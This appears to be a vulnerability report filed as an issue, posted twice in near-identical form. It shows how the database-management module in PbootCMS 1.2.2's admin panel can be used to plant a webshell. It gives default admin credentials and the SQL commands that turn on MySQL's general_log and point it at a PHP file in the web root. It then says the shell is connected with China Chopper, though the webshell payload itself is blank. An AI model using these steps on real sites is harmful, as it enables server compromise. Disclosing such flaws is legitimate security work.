There is a getshell vulnerability here, the integrated database management module executes the sql statement + mysql GLOBAL general_log function,Pbootcms version 1.2.2
1.The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms\static\backup\sql\20180720164810_pbootcms.sql
2.Open http://127.0.0.1/PbootCMS/admin.php in the browser and enter the account password to enter the background..
username=admin
password=123456
2.Set the log file path
SET GLOBAL general_log_file = 'E:\Pentest_tool\phpStudy\PHPTutorial\WWW\PbootCMS\1.php';
3.Enter a select statement with a sentence webshell
select ;
The webshell has been written to the log file 1.php
Connect to webshell using china chopper
PS:Cannot write to webshell via export file, because mysql defaults to secure-file-priv
The text was updated successfully, but these errors were encountered:
There is a getshell vulnerability here, the integrated database management module executes the sql statement + mysql GLOBAL general_log function,Pbootcms version 1.2.2
1.The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms\static\backup\sql\20180720164810_pbootcms.sql
2.Open http://127.0.0.1/PbootCMS/admin.php in the browser and enter the account password to enter the background..

username=admin
password=123456
http://127.0.0.1/PbootCMS/admin.php/Site/server Can get the absolute path of the server

E:/Pentest_tool/phpStudy/PHPTutorial/WWW/PbootCMS/
Database management module

http://127.0.0.1/PbootCMS/admin.php/Database/index
Here you can enter any sql statement,
Use mysql GLOBAL general_log write webshell
1.SET GLOBAL general_log = 'On';

2.Set the log file path

SET GLOBAL general_log_file = 'E:\Pentest_tool\phpStudy\PHPTutorial\WWW\PbootCMS\1.php';
3.Enter a select statement with a sentence webshell




select ;
The webshell has been written to the log file 1.php
Connect to webshell using china chopper
PS:Cannot write to webshell via export file, because mysql defaults to secure-file-priv
The text was updated successfully, but these errors were encountered: